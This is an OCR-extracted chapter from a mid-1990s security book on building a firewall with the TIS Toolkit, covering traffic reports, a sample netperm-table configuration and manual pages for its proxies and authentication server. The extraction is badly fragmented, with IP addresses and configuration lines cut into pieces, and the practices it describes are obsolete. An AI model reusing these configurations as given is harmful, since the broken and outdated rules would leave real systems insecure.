-----------9
21
...
org
1
1
...
compmore
...
6
skhan@compmore
...
6
chrish
2
2
...
3713@compuserve
...
5
chrish@fonorola
...
1
chrish@unilabs
...
9
denny@nstn
...
9
chrish@nds
...
net
Top 100 mail senders (in kilobytes)
Messages
Count
Kb
Address
-----------9
21
...
org
1
1
...
compmore
...
sh) combines activity through the firewall of
the telnet and rlogin services
...
sh:

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

389

How to Build a Firewall

Top 100 telnet gateway clients (total:
Connects
Host/Address
------------------17
stargazer
...
or
16
pc
...
org/204
...
unilabs
...
unilabs
...
191
...
14
1
unknown/206
...
65
...
unilabs
...
1

43)
Input
----924
97325
274
26771
27271
10493
0

Output
-----177
1243
6
717
710
701
0

Total
----1101
98568
280
27488
27981
11194
0

Top 100 telnet gateway clients in terms of traffic
Connects
Host/Address
Input
Output
---------------------------16
pc
...
org/204
...
unilabs
...
191
...
14
27271
710
1
unknown/206
...
65
...
unilabs
...
unilabs
...
unilabs
...
1
0
0

Total
----98568
27488
27981
11194
1101
280
0

Top 100 Denied telnet gateway clients (total: 20)
Connects
Host/Address
------------------14
stargazer
...
or
2
stargazer
...
or
2
204
...
3
...
uni
1
unknown/204
...
3
...
fonorola
...
You can see, for example, that stargazer
...
org
is in both the connections and denied lists
...


Where to Go for Help
Help with the TIS Toolkit is easy to find
...
2600
alt
...
security

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

390

Part II: Gaining Access and Securing the Gateway

You can also find help by joining the mailing list concerned with a general discussion of
firewalls and security technology:
firewalls@greatcircle
...
com

with the text
subscribe firewalls

in the body of the message
...
com

In addition, the TIS Toolkit includes a large amount of documentation on firewalls
...
Before
you commit to an operating system and hardware platform, ask questions on this mailing list;
probably many of the list’s readers have had similar questions and experiences
...
To help you understand this file better, a
prodigious amount of comments are included
...

#
#
#
#
#
#
#
#
#
#

Sample netperm configuration table
Change YOURNET to be your network IP address
Change YOURADDRESS to be the IP address of a specific host
Example netacl rules:
--------------------if the next 2 lines are uncommented, people can get a login prompt
on the firewall machine through the telnet proxy

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

391

How to Build a Firewall

# This is okay, but means that anyone who is authorized to connect to the
# firewall box through the proxy can get a login prompt on the firewall
...

#netacl-telnetd: permit-hosts 127
...
0
...

netacl-telnetd: permit-hosts 206
...
65
...
116
...
3 -exec /usr/libexec/telnetd
#
# if the next line is uncommented, the telnet proxy is available
#netacl-telnetd: permit-hosts * -exec /usr/local/etc/tn-gw
#
# if the next 2 lines are uncommented, people can get a login prompt
# on the firewall machine through the rlogin proxy
#netacl-rlogind: permit-hosts 127
...
0
...
6
...
2 -exec /usr/libexec/rlogind -a
#
# if the next line is uncommented, the rlogin proxy is available to any host
#netacl-rlogind: permit-hosts * -exec /usr/local/etc/rlogin-gw
#
# The next line allows FTP sessions from the specified network(s) to the
# firewall system itself
...
116
...
* -exec /usr/libexec/ftpd -A -l
#
# Uncommenting the next line will turn off FTP and print a message to that
# effect whenever someone attempts to access the FTP port
...
116
...
147 -exec /bin/cat /usr/local/etc/noftp
...
* -exec /usr/libexec/fingerd
#netacl-fingerd: permit-hosts * -exec /bin/cat /usr/local/etc/finger
...

smap:
userid 6
smap:
directory /var/spool/smap
smap:
timeout 3600
#
# Change this to increase/decrease the maximum message size that will be
# permitted
...

ftp-gw:
denial-msg
/usr/local/etc/ftp-deny
...
txt
ftp-gw:
help-msg
/usr/local/etc/ftp-help
...
116
...
*
#
# the following line logs all get and put requests, and authorizes put
# requests
...
116
...
*
-log { retr stor } -auth { stor }
# uncomment the following line if you want external users to be
# able to do FTP with the internal network using authentication
#ftp-gw:
permit-hosts * -authall -log { retr stor }
#
# Example telnet gateway rules:
# ----------------------------tn-gw:
denial-msg
/usr/local/etc/tn-deny
...
txt
tn-gw:
help-msg
/usr/local/etc/tn-help
...
fonorola
...
All other requests are denied
...
116
...
* -dest *
...
net -dest !* -passok ¯xok

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

393

How to Build a Firewall

tn-gw:
permit-hosts 206
...
65
...
116
...
150
# if this line is uncommented incoming traffic is permitted WITH
# authentication required
# tn-gw:
permit-hosts * -auth
# Example rlogin gateway rules:
# ----------------------------#rlogin-gw:
permit-hosts YOURNET
...
txt
rlogin-gw:
welcome-msg
/usr/local/etc/rlogin-welcome
...
txt
#rlogin-gw:
help-msg
/usr/local/etc/rlogin-help
...
116
...
* -dest *
...
net -dest !* -passok -xok
rlogin-gw:
deny-hosts * -dest 206
...
65
...
0
...
1
authsrv:
database /usr/local/etc/fw-authdb
authsrv:
badsleep 1200
authsrv:
nobogus true
authsrv:
permit-hosts localhost
# clients using the auth server
*:
authserver 127
...
0
...

#
# Uncomment the next line to allow NNTP connections to be routed to an
# external news server for news reading
...
* -plug-to NEWS_SERVER_IP
#
# Uncomment the next line to allow POP mail connections from the private
# network to an external POP mail host
...
* -plug-to POP_MAIL_HOST_IP
#
# HTTP-GW
# -------# This section provides some examples for the http-gw proxy
#
http-gw:
userid www
# http-gw:
directory /usr/local/secure/www
http-gw:
timeout 1800
http-gw:
default-httpd www
...
net
http-gw:
default-gopher gopher
...
net
http-gw:
permit-hosts 206
...
65
...
116
...
2
http-gw:
deny-hosts unknown

Manual Reference Pages
The following manual pages are taken from the TIS Toolkit and modified to fit within the
formatting of this book
...
The sections not
generally included are BUGS, SEE ALSO, and FILES
...
Each
manual page includes the following sections:
s Synopsis
s Description
s Options
s Installation
Command-specific sections are also included
...


Authmgr—Network Authentication Client Program
Synopsis
authmgr

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

395

How to Build a Firewall

Description
authmgr is a client-side interface to the authentication daemon authsrv
...
The authmgr program passes most of its commands directly over a network to
authsrv
...


Options
authmgr takes no command-line options, reading its configuration information from the
firewall Toolkit configuration file netperm-table
...
If the optional port is specified, it is used as a numeric service port value
...
Keys
must match between client and server
...


Installation
To install authmgr, configure the authserver option in netperm-table to contain the address of
the authentication server system
...


authsrv—Network Authentication Third-Party
Daemon
Synopsis
authsrv via inetd

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

396

Part II: Gaining Access and Securing the Gateway

Description
authsrv functions as a simple third-party authentication server, and provides an integrated
interface for multiple forms of authentication, such as passwords, one-time passwords, and
token authentication systems
...
authsrv maintains extensive logs of transactions, authentication failures and successes, and all changes to its database
...

Many commercial products for authentication include their own programming interface; for
this reason, the simultaneous support of multiple forms of authentication within a single piece
of software is cumbersome
...
Currently authsrv contains support for
Digital Pathways Secure Net Key, Security Dynamics SecurID, Bellcore S/Key, and plaintext
passwords
...
When a client connects to the authentication server, it issues a request to authenticate a
user:
authorize userID
authenticate userID

To which the server will respond with one of two options:
password
challenge challengestring

The client program should prompt the user for a (non-echoing) password if it receives the
“password” response, or it should prompt the user with the returned challenge string if it
receives the “challenge” response
...
The client program forwards the response in the
form of:
response responsestring

In some cases, the server may respond with “OK” followed by additional text on the same line
...
Change your
password soon”)
...
If it is
invoked from a terminal with the current user-id being 0 (“root”) it will automatically grant
administrative privileges to the session
...

Generally, authsrv is designed to run on a secured system that is relatively restricted to users
...
To ease administration, authsrv can be managed remotely using a client program
with optional DES-encrypted communications between the client and server
...
Each user may be assigned to a group,
consisting of a short arbitrary string name
...
A group administrator can create, enable, disable, and
delete users from that group, but may not create additional group administrators or groups
...
This
setup provides a flexible management environment—a variety of management schemes can be
implemented
...
To implement a hierarchical management scheme,
create several group administrators and let each manage a group separately
...
All operations can be performed at a group
level, and new groups can be created by running authsrv in administrator mode on the system
where the database resides
...
All configuration rules in netperm-table
for application “authsrv” are read, and the following clauses and parameters are recognized:
database pathname

This command specifies the pathname of the authsrv database
...
If the software is built with a compiled-in
database name, this option need not be set, otherwise it is mandatory
...

If nobogus is set, attempts to log in will return more explicit error messages
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

398

Part II: Gaining Access and Securing the Gateway

The following command establishes a “sleep time” for repeated bad logins:
badsleep seconds

If a user attempts to authenticate five times and fails, their user record is marked as suspicious,
and they cannot log in again
...
If the badsleep value is 0, users may attempt (and fail) to
log in as many times as they would like
...

To specify the userid that authsrv should run under, use a name from the password database,
or a numeric userid in the command:
userid name

To specify that authsrv should permit the named host or addresses to use the service, add this
command:
hosts host-pattern [key]

Hosts that do not have a matching entry are denied use of the service
...


Commands
The following command implements the first part of the authentication sequence:
authorize username

If the authorize command is issued after a user has already authenticated to the authentication
server, their current authentication is cleared
...

This is returned in response to a password or challenge query from the authentication server:
response

To disconnect from the authentication server, issue:
quit

or exit

To display the status, authentication protocol, and last login of the specified user, issue the
command:
display username

Before the authentication server permits the use of this command, the user must first be
authenticated to the server as the administrator, or the group administrator of the group to
which the user belongs
...
If the user is a
group administrator, the newly created user is automatically initialized as a member of that
group
...
If a long name is provided, it will
be stored in the database
...
Ranum”

To delete the specified user from the authentication database, use the command:
deluser username

Before this command can be used, the user must first be authenticated to the server as the
administrator or group administrator of the group to which the user being deleted belongs
...

To set the password for the current user, issue:
password [username] text

If an optional username is given and the authenticated user is the administrator or group
administrator, the password for the specified user is changed
...
For example, if the
user’s authentication protocol is plaintext passwords, the command will update the plaintext
password
...

The following command sets the authentication protocol for the specified user to the named
protocol:
proto user protoname

Available protocols depend on the compiled-in support within authsrv
...
To set the specified user’s group, use the
command:
group user groupname

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

400

Part II: Gaining Access and Securing the Gateway

To use this command, a user must first be authenticated to the server as the administrator
...

The following commands set and unset the group administrator flag on the specified user
...

wiz user
unwiz user

This command sets the specified user as a global administrator:
superwiz user

Warning The superwiz command should be used with caution
...
For this reason, global
administrative privileges are seldom used
...
The list displays
several fields, including:
s user
...

s group
...
If none is listed, the user is in no group
...
The user’s full name
...

s status
...
If this field is marked “y” the user is
enabled and may log in
...
If marked “b” the
users login is temporarily disabled because of too many bad login attempts
...

s proto
...

s last
...

To list a short synopsis of available commands, use this command:
?

or help

To determine if the named user is allowed to perform the specified service, use the command:
operation user username service dest [other tokens] [time low# high#]

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

401

How to Build a Firewall

The service might be any one of the application gateway such as telnet-gw, ftp-gw, or rlogingw
...
The optional tokens are matched as wildcards to
permit a proxy to specify more detailed operations
...
If no match is found, a message indicating that no match was
found is returned to the client program
...
tis
...
tis
...
For each user/group the name is specified
followed by the service destination [optional tokens] [time start end]
...
The name is either the username or the
group name
...
The optional tokens are checked for
a match, permitting a proxy to send a specific operation check to the authentication server
...
The start_time and
end_time parameters can be in the range 00:00 to 23:59
...
tis
...
tis
...
tis
...
com
deny-operation group admin ftp-gw *
...

To initialize the database, use the command su to go to the root directory, run authsrv at the
command line, then issue the following commands:
#
# authsrv
-administrator modeauthsrv# list
Report for users in database
user
group
longname
ok? proto
last
----------------- -------authsrv# adduser admin ‘Auth DBA’
ok - user added initially disabled
authsrv# ena admin
enabled
authsrv# proto admin Snk
changed
authsrv# pass ‘160 270 203 065 022 034 232 162’ admin
Secret key changed
authsrv# list

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

402

Part II: Gaining Access and Securing the Gateway

Report for users in database
user
group
longname
--------------admin
Auth DBA
authsrv# quit
#

ok? proto
last
--- -------ena Snk
never

In this example, the administrator account is established, then enabled, a protocol is assigned,
and the initial password is set
...
In this example, the administrator record is using a SecureNet
Key, so the password record consists of the shared secret key used by the device
...
conf, then restart inetd
...


Note Ensure that the database is protected against casual perusal by checking its file
permissions
...
When ftpgw is invoked from inetd, it reads its configuration and checks to see if the system that has just
connected is permitted to use the proxy
...
If the peer is permitted to use the proxy, ftp-gw enters a
command loop in which it parses all FTP requests and passes them to a remote FTP server
...

Two methods are supported to permit users to specify the system they want to FTP to through
the proxy
...

220 gatekeeper FTP proxy (Version 1
...

Name (host:user): user@somplace
331-(----GATEWAY CONNECTED TO someplace----)
331-(220 someplace FTP server (Version 5
...
)
331 Password required for user
...

Remote system type is Unix
...

ftp> quit
221 Goodbye
...
This is
useful in supporting modified ftp clients that “understand” the proxy
...
If this option is provided, ftp-gw
will treat the session as if it has been authenticated for the specified user
...
The
version of ftpd used should only pass this parameter when the user has been adequately
authenticated
...

ftp-gw reads its configuration rules and permissions information from the firewall configuration table netperm-table, and retrieves all rules specified for “ftp-gw”
...
If this value is
specified, ftp-gw will set its user-id before providing service
...

To specify a directory to which ftp-gw will chroot(2) prior to providing service, use the
command:
directory pathname

The name of a file to display to the remote user if he or she is denied permission to use the
proxy is entered with the command:
denial-msg filename

If this option is not set, a default message is generated
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

404

Part II: Gaining Access and Securing the Gateway

To specify the name of a file to display as a welcome banner upon successful connection, use
the command:
welcome-msg filename

If this option is not set, a default message is generated
...
To specify the file to use if help is issued, use
the command:
help-msg filename

If this option is not set, a list of the internal commands is printed
...

The following command specifies the idle timeout value in seconds:
timeout seconds

When the specified number of seconds elapses with no activity through the proxy server, it will
disconnect
...

The following rules specify host and access permissions:
hosts host-pattern [host-pattern2
...
33
...
* 192
...
214
...
Optional parameters permit the selective enabling or
disabling of logging information
...
Specifies that no matter what, the proxy should not accept input over a
PORT
...

s -nooutput
...
Attempts to do so result in the port being closed
...
Specifies that a log entry to the system log should be made whenever the listed
operations are performed through the proxy
...
The format is as follows:
-log operation
-log { operation1 operation2
...
Specifies that the proxy should permit no operation (other than the quit
command) until the user has authenticated to the server
...
}

s -auth
...
The format is as follows:
-dest pattern
-dest { pattern1 pattern2
...
Specifies a list of valid destinations
...
The -dest list is processed in the order it appears on the options line
...
The following
rule permits hosts that are not in the domain “mit
...
mit
...
Specifies a list of FTP operations to deny
...
The format is as follows:
-deny operation
-deny { operation1 operation2
...
For authentication, the proxy recognizes the following
options:
authorize username
auth username (shorthand form)
response password
resp password (shorthand form)
If the proxy requires authentication, attempts to use the service requested will
¯not be permitted
...

220 gatekeeper FTP proxy (Version 1
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

406

Part II: Gaining Access and Securing the Gateway

Name (host:user): user@somplace
500 command requires user authentication
Login failed
...
60/mjr) ready
...

Password:

Unfortunately, whenever the quote command is used passwords are visible
...


Installation
To install ftp-gw, place the executable in a system area, then modify /etc/inetd
...
The TCP
service port on which to install the FTP proxy will depend on local site configuration
...
If the firewall doubles as an anonymous
FTP archive, the proxy should be installed at another port
...
Most BSD Unix versions of the FTP client do, but some PC or Macintosh
versions do not
...
conf has been modified, restart or reload inetd
...

Typical configuration of the proxy in a firewall setup includes the use of rules, which block all
systems that are not in the DNS from using the proxy, but permit all systems on the internal
protected network to use the proxy
...
33
...
*

192
...
214
...
This
program allows Gopher and Gopher+ client to access Gopher, Gopher+, and FTP servers
...
Both

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

407

How to Build a Firewall

standard and proxy-aware WWW clients are supported
...
Except where noted, client means Gopher,
Gopher+, WWW, or proxy aware WWW clients; server means Gopher, Gopher+, HTTP, or
FTP servers
...
Non proxy aware clients should be
set up so that their HOME PAGE is the proxy
...

s WWW (URLs)
...

s Gopher
...


Options
s -d file
...
It
allows debugging information to be written to the specified file
...
This option turns on the debugging log if specified
...


Operation
htttp-gw is invoked from inetd(8); it reads its configuration and checks to see if the system that
has just connected is permitted to use the proxy
...
If the peer is permitted to use the proxy, http-gw reads in a single line request
which it then decodes
...
Most requests carry the
information that the proxy needs in the first line
...
The client then connects to the host on the port and sends the selector
...
The proxy has to determine the host
and port from information contained in the selector
...
Both Gopher and WWW clients do none or only

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

408

Part II: Gaining Access and Securing the Gateway

minimal processing on the selector
...

The proxy has to process three types of information:
s Gopher menus
...
The first character of the description tells the client the type of information
the entry refers to
...
Contains hypertext that can contain embedded links to other documents
...

s Other data files
...
The proxy passes the data
through without changing it
...
This is also the form of selector that is used in HTML
documents
...
The following table lists gopher types
and their related extensions
...
gif

DOS archives

5


...
zoo
...
arc
...
exe
...
dll
...
sys

Misc Images

I


...
jpeg
...
pct
...
tif
...
tar
...
gz

MAC archives

4


...
au
...
wav

HTML Documents

h


...
htm

Misc Documents

9


...
wri

Directories

1

Filenames that end in /

Plain text

0

All other extensions

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

409

How to Build a Firewall

Configuration
http-gw reads its configuration rules and permissions information from the firewall configuration table netperm-table, retrieving all rules specified for “http-gw” and “ftp-gw
...
The following configuration rules are recognized:
userid user

Specifies a numeric user-id or the name of a password file entry
...
Note that this option is included mostly for
completeness; HTTP-GW performs no local operations likely to introduce a security hole
...

timeout secondsvalue

The preceding value is used as a dead-watch timer when the proxy is reading data from the net
...

default-gopher server

The default-gopher option specifies a Gopher server that receives handed off requests
...

ftp-proxy server

The ftp-proxy server option defines an ftp-gw that should be used to access FTP servers
...
Because the ftpgw rules will be used if there are no relevant http-gw rules, this is not a major problem
...
] [options]
deny-hosts host-pattern [host-pattern
...
Typically, a hosts rule will be in the
form of:
http-gw:
http-gw:

deny-hosts unknown
hosts 192
...
112
...
94
...
*

Several host patterns may follow the “hosts” keyword, ending with the first optional parameter
beginning with “-”
...

permit-hosts options

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

410

Part II: Gaining Access and Securing the Gateway

The permit-hosts rule can use options
...
The functions are
defined later (see “Gopher Functions”)
...
] }

The -permit option permits only the specified functions
...
If this
option is not specified then all functions are initially permitted
...
] }

The -deny option specifies a list of Gopher/HTTP functions to deny
...

-httpd server

The -httpd option makes server the default HTTP server for this transaction
...

-filter function
-filter { function [function
...
This
option does not stop the user from entering selectors that the client will execute locally, but
this option can be used to remove selectors from retrieved documents
...

-nooutput

The -nooutput option disables data write functions
...
] }

The -log option specifies that a log entry to the system log should be made whenever the listed
functions are performed through the proxy
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

411

How to Build a Firewall

-auth function
-auth { function [function
...

-dest pattern
-dest { pattern [pattern
...
If no list is specified, all destinations are
considered valid
...
-dest
entries preceded with a ‘!’ character are treated as negation entries
...
edu” to be connected
...
mit
...
For the deny options
the request is used
...

Function

Description

dir

Fetching Gopher menus
Getting a directory listing via FTP
Fetching an HTML document (this is being studied)

read

Fetching a file of any type
HTML files are treated as read even though they are also of dir format

write

Putting a file of any type
Needs plus because it is only available to Gopher+ and HTTP/1
...
(See
“Security
...
When the client wants to perform
certain actions, such as telnet, the client program often runs the telnet command to perform

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

412

Part II: Gaining Access and Securing the Gateway

the function
...
Gopher requests to do FTP operations cause the
server to run the FTP program
...

Most client programs only know how to display a small number of data types; they rely on
external viewers to handle the other data types
...


Installation
To install HTTP-GW place the executable in a system area, then modify /etc/inetd
...
The
TCP service port on which to install the Gopher/HTTP proxy depends on local site configuration
...
70 is the normal
Gopher port and 80 is the normal HTTP port
...
conf has been modified, restart or
reload inetd
...

Typical configuration of the proxy in a firewall situation involves rules to block all systems that
are not in the DNS from using the proxy, but to permit all systems on the internal protected
network to use the proxy, as in this example:
http-gw: deny-hosts unknown
http-gw: hosts 192
...
112
...
94
...
*

login-sh—Authenticating Login Shell
Synopsis
login-sh

(invoked from /bin/login)

Description
login-sh provides a simple interface to the authentication service for login by replacing the
user’s login shell with a “wrapper” that requires the user to authenticate first; the program then
executes the real login shell
...
The user’s actual login shell information is stored
in an external file
...
This is attractive because it
separates the authentication policy from the permissions granting policy (/bin/login)
...
” The following configuration rules are recognized:

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

413

How to Build a Firewall

authserver address port

This command specifies the network address and service port of the authentication server to
use
...
Empty lines and lines with a pound sign (#) as the first character are
discarded or treated as comments
...
The userid field matches the login name of the user
invoking login-sh from the /etc/passwd file
...
The third and remaining
fields are parameters to pass to the executable program, starting at parameter zero
...
When you use these command interpreters, make sure you define them with their
required forma—typically a leading dash “-”
...
Systems that are using login-sh should have all programs
that permit users to change their login shells disabled, or should have the setuid bit stripped
...
A minimum of two parameters must exist for each login shell that is
defined
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

414

Part II: Gaining Access and Securing the Gateway

netacl—TCP Network Access Control
Synopsis
netacl servicename (invoked from inetd)

Description
netacl provides a degree of access control for TCP-based services invoked from inetd(8)
...
netacl then searches its permissions information (read from netperm-table ) to see
if the host initiating the connection is authorized
...
Acceptance or rejection of the service is logged
through the syslog facility
...


Options
netacl accepts one parameter: the name of the service it is to provide
...
If invoked with no parameters, the service is assumed to be
the program name, just in case an administrator needs to replace the executable of some
daemon with a copy of netacl
...
telnetd:
netacl in
...
Host permission rules are in the form:
netacl-in
...
telnet deny-hosts host1 host2 -options

Following the permit-hosts or deny-hosts clause is a list of host names or IP-addresses that can
contain wildcards
...
If the rule
is a deny-hosts rule, the program will log the denial of the service and exit
...
If no rule is explicitly
permitting or denying a service, the service is denied
...
Specifies a program to invoke to handle the service
...
An -exec option must be present in every
rule
...
userid is the numeric UID or the name from a login in /etc/passwd that is
used to invoke the program
...
Specifies a directory to which netacl should chroot(2) prior to
invoking the service program
...


Examples
In this example, the \ line wraps have been added to fit lines on the page
...

netacl-in
...
33
...
* -exec /usr/etc/in
...
ftpd: permit-hosts unknown -exec /bin/cat /usr/local/etc/noftp
...
ftpd: permit-hosts 192
...
112
...
ftpd
netacl-in
...
ftpd
is configured to accept all connections from systems that do not have a valid DNS name
(“unknown”) and to invoke cat to display a file when a connection is made
...
Hosts in the specified subnet are connected to the real FTP server in /usr/etc/in
...

Connections from other networks are connected to a version of the FTP server that is already
chrooted to the FTP area, effectively making all FTP activity “captive
...
conf as desired,
replacing entries for the servers that will be controlled via netacl
...
ftpd

After inetd
...
Verify installation by attempting a
connection and monitoring the system logs
...
When plug-gw is invoked from inetd, it
reads its configuration and checks to see if the system that has just connected is permitted to
use the proxy
...
If the peer is permitted to use the
proxy, plug-gw determines (based on its configuration) what host to connect to on the “other
side
...


Options
plug-gw reads its configuration rules and permissions information from the firewall configuration table netperm-table, and retrieves all rules specified for “plug-gw
...

If no timeout is specified, the default is to remain connected until one side or the other closes
its connection
...
When a connection is made, a match is searched
for on the port-id and calling host
...
If the calling port matches, then the host-pattern is
checked for a match, following the standard address matching rules employed by the firewall
...
Sub-options include:
s -plug-to host
...
This option is
mandatory
...
Indicates that a reserved port number should be used when connecting
...

s -port- portid
...
The default port is the same as the port used
by the incoming connection
...
conf to install pluggw for whatever services will be plugboarded
...

plug-gw was designed to permit “tunneling” NNTP traffic through firewalls, but it can be used
for a variety of purposes such as permitting remote access to a single service on a single host
...
The USENET news software must
then be configured so that both the internal and external NNTP servers believe they are
exchanging news with the firewall machine
...
In this example
the interior news server host is “foo
...
org” (111
...
1
...
outside
...
22
...
22)
...
us
...
” On the bastion host, you place an entry for the NNTP service in inetd
...

The configuration entries in netperm-table are as follows:
plug-gw:
plug-gw:
plug-gw:
plug-gw:

timeout 60
port webster 111
...
1
...
LCS
...
EDU -port webster
port nntp 111
...
1
...
22
...
22 -port nntp
port nntp 222
...
2
...
11
...
11 -port nntp

Whenever 111
...
1
...
22
...
22’s nntp service
...
11
...
11 should be configured to believe
that its news server is the bastion host “bastion
...
org”—the host from which it transfers and
receives news
...


Bugs
Because incoming connection hosts can be wildcarded, plug-gw works well in a many-to-one
relationship but does not work at all in a one-to-many relationship
...
Unfortunately, the software will have to be modified if
multiple instances of plug-gw are on the same port, or the internal news server’s software
cannot support connecting on a non-standard port
...
When
rlogin-gw is invoked from inetd, it reads its configuration and checks to see if the system that
has just connected is permitted to use the proxy
...
If the peer is permitted to use the proxy, rlogin-gw checks the username
that is provided as part of the rlogin protocol, and if it is in the form user@host, an attempt is
made to reconnect to the host and log in as that user
...
” The following
configuration rules are recognized:
directory pathname

This rule specifies a directory to which rlogin-gw will chroot(2) prior to providing service
...

timeout seconds

The timeout rule specifies the time, in seconds, the system remains idle before disconnecting
the proxy
...

denial-msg filename

The denial-msg rule specifies the name of a file to display to the remote user if he or she is
denied permission to use the proxy
...

help-msg filename

The help-msg rule specifies the name of a file to display if the “help” command is issued
...

denydest-msg filename

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

419

How to Build a Firewall

The denydest-msg rule specifies the name of a file to display if a user attempts to connect to a
remote server for which he or she is restricted
...

authserver hostname [portnumber [cipherkey] ]

The authserver rule specifies the name or address of a system to use for network authentication
...
If the server
supports DES-encryption of traffic, an optional cipherkey can be provided to secure communications with the server
...
] [ options]

The hosts rules specify host and access permissions
...
33
...
* 192
...
214
...
Optional parameters are:
-dest pattern
-dest pattern1 pattern2
...
If no list is specified, all destinations are
considered valid
...
-dest
entries preceded with a “!” character are treated as negation entries
...
edu” to be connected
...
mit
...

-passok

The -passok option specifies that the proxy should permit users to change their passwords if
they are connected by the designated host
...


Installation
To install rlogin-gw place the executable in a system area, then modify inetd
...
The rlogin proxy must be installed on the rlogin port (port 513)
in order to function without requiring modified clients
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

420

Part II: Gaining Access and Securing the Gateway

smap—Sendmail Wrapper Client
Synopsis
smap

(invoked from inetd)

Description
The smap client implements a minimal version of SMTP, accepting messages from over the
network and writing them to disk for future delivery by smapd
...
This arrangement overcomes potential security risks
presented by privileged mailers running where they can be accessed from over a network
...
Each session’s mail is
recorded in a temporary file in its spool directory, with the SMTP envelope encoded in the
heading of the file
...
As a secondary means of signaling when a message is completely gathered, the mode of
the file, which is initially 644, is changed to 755
...


Options
smap takes no command-line options
...
The name can be either a
name from the password database, or a numeric user-ID
...

directory pathname

The directory option specifies the spool directory where smap should store incoming messages
...

maxbytes value

maxbytes specifies the maximum size of messages to gather, in bytes
...

maxrecip value

The maxrecip option specifies the maximum number of recipients allowed for any message
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

421

How to Build a Firewall

timeout value

This option specifies a timeout, after which smap should exit if it has not collected a message
...


Installation
To install smap, locate the spool directory where mail will be collected
...
Install
smap in /etc/inetd
...
conf you need to signal inetd to reload its configuration information; you also need to make sure that sendmail is no longer running on the system
...
Usually, the best
recommendation is to build smap so that it is completely standalone; that is, a statically-linked
executable that is linked to a resolver library that will not crash if it is unable to read /etc/
resolv
...
A small number of support files (/etc/hosts, /etc/resolv
...
Be
careful not to install any device files or executables in the spool directory
...


Note smap assumes that smapd will also be running on the system
...
local)

Description
The smapd daemon periodically scans the mail spool area maintained by smap and delivers any
messages that have been gathered and stored
...
If the mail cannot be delivered normally, smapd can be configured to store spooled
files to an area for later examination
...
All configuration rules in netperm-table for
application “smapd” are read, and the following clauses and parameters are recognized:
executable pathname

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

422

Part II: Gaining Access and Securing the Gateway

The executable option specifies the pathname of the smapd executable itself
...

This entry is mandatory
...
smapd
assumes the use of sendmail but does not require it
...
]

The reason for this requirement is the exit code from the mailer is used to determine the status
of delivery
...

baddir pathname

The baddir option specifies a directory where smapd should move any spooled mail that
cannot be delivered normally
...
The pathname specified should not contain a
trailing forward slash (/)
...
The name can be either
a name from the password database, or a numeric user-ID
...

directory pathname

The directory option specifies the spool directory in which smapd should search for files
...

wakeup value

wakeup specifies the number of seconds smapd should sleep between scans of the spool
directory
...


Installation
To install smapd configure the executable and directory options in netperm-table and add
them to /etc/rc
...
A sample netperm-table configuration for ssmap and smapd looks like
this:
# email wrapper control
smap, smapd:
userid 4
smap, smapd:
directory /mail/inspool
smapd:
executable /usr/local/etc/smapd
smap:
maxrecip 4000
smap:
maxbytes 1048576
smap:
timeout 3600

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

423

How to Build a Firewall

In this example, both smap and smapd are running with user-id #4 (uucp) in the spool
directory /mail/inspool
...
To do this, add something similar to the following line in the crontab file:
0,30 * * * * /usr/lib/sendmail -q > /dev/null 2>&1

tn-gw—telnet Proxy Server
Synopsis
tn-gw [invoked from inetd]

Description
tn-gw provides pass-through telnet proxy services with logging and access control
...
If not, tn-gw shuts down the connection, displays a
message, and logs the connection
...

sol-> telnet otter
Trying 192
...
112
...

Connected to otter
...

otter telnet proxy (Version V1
...
09
...

sol->

Because of limitations in some telnet clients, options negotiation may possibly fail; such an
event will cause characters not to echo when typed to the tn-gw command interpreter
...
The default
display (without the argument) is the connecting hostname followed by port number 0
...


Options
tn-gw reads its configuration rules and permissions information from the firewall configuration
table netperm-table, where it retrieves the rules specified for “tn-gw
...
If this value is
specified in-gw will set its user-id before providing service
...

directory pathname

directory specifies a directory to which tn-gw will chroot(2) prior to providing service
...

denial-msg filename

denial-msg specifies the name of a file to display to the remote user if he or she is denied
permission to use the proxy
...

timeout seconds

The timeout option specifies the number of seconds the system should remain idel before it
disconnects the proxy
...

welcome-msg filename

welcome specifies the name of a file to display as a welcome banner after a successful connection
...

help-msg filename

The help option specifies the name of a file to display if the “help” command is issued
...

denydest-msg filename

The denydest-msg option specifies the name of a file to display if a user attempts to connect to
a restricted remote server
...

